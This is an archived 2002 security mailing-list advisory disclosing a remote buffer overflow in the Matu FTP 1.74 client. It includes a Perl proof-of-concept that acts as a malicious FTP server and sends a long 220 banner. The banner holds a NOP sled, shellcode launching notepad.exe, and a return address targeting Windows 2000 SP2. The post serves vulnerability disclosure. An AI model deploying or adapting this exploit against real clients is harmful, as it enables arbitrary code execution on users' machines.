OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Kanatoko (anviljumperz.net)
Date: Mon Apr 22 2002 - 04:45:46 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Matu FTP remote buffer overflow vulnerability

    /*---------------------------
     Description
    ---------------------------*/
    Matu FTP is a Japanese FTP client software for Win32 Platform.
    We found an exploitable buffer overflow problem in Matu FTP Version 1.74.
    The buffer overflow occurs when a long string like

    220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>

    is received by Matu FTP in the beginning of an FTP session.
    This vulnerability allows malicious FTP server to execute
    an arbitrary code on client hosts.

    /*---------------------------
     Vendor Status
    ---------------------------*/
    Notified with no response

    /*---------------------------
     POC
    ---------------------------*/
    This exploit code is invoked as an FTP server through inetd.

    #!/usr/local/bin/perl

    #------------------------------------------------------
    # Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
    # ( run under inetd )
    # written by Kanatoko <anviljumperz.net>
    # http://www.jumperz.net/
    #------------------------------------------------------
    $|=1;

            #egg written by UNYUN (http://www.shadowpenguin.org/)
    $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
    $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
    $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
    $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
    $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
    $egg .= "notepad.exe";

            #egg_address = 0x0012F43C
    $buf = "\x90" x 217;
    $buf .= $egg;
    $buf .= "A" x 2;
    $buf .= "\x3C\xF4\x12\x00";
    $buf .= "B" x 80;

    print "220 $buf\r\n";

    --
    

    #sorry for the bad english

    Kanatoko <anviljumperz.net> http://www.jumperz.net/(Japanese)